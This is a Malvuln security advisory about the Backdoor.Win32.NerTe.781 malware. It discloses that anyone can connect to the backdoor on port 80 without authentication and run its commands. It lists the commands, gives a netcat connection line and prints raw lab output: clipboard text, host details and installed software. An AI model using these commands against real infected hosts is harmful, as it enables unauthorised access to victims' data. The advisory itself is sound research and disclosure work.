Discovery / credits: Malvuln - (c) 2021  
Original source:  
Threat: Backdoor.Win32.NerTe.781  
Vulnerability: Unauthenticated Remote Command Execution   
Description: Third-party attackers who can reach infected systems can connect to port 80 and run commands made available by the backdoor to retrieve information etc.  
Type: PE32  
MD5: 776e8bb41adf8bd95865c0b03637d8d7  
Vuln ID: MVID-2021-0265  
Dropped files: nsrv78.exe  
Disclosure: 07/03/2021  
Example commands:  
GETCLB (Get Clipboard data)  
GETSND (Get sounds)  
GETIN2 (Get Installed Software)  
nc64.exe x.x.x.x 80  
GETCLB*************** Clipboard **************├▒Tomorrow West 18th and broadway.├▒*************** End **************ÔĽóGETSND  
MSGUnknown commandÔĽóGETIN2  
GETIN2DESKTOP-2C4IQHO├▒Victim├▒├▒├▒├▒├▒7:56:40 PM├▒1 Hour, 11 Minutes, 42 Seconds.├▒1├▒1├▒1├▒2814.17├▒UnknownÔĽó  
GETIN4NTFS├▒C:\Program Files (x86)\NerTe├▒A2C9-AD2F├▒85405782016├▒12950585344├▒512├▒8├▒20,851,021├▒3,161,764├▒Fixed├▒CD├▒C: []├▒D: []ÔĽó  
GETIN6HxD Hex Editor version├▒NerTe├▒WinPcap 4.1.3├▒WinSCP 5.13├▒Wireshark 2.4.5 64-bit├▒Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319├▒Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148├▒Python Launcher├▒Java Auto Updater├▒Microsoft Visual C++ 2017  
C:\Users\Victim\AppData\Local\Programs\Python\Python2\;C:\Users\Victim\AppData\Local\Microsoft\WindowsApps;;C:\Users\Victim\AppData\Local\Programs\Fiddler;C:\Program Files (x86)\Fiddler2\Fiddler├▒0PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.  
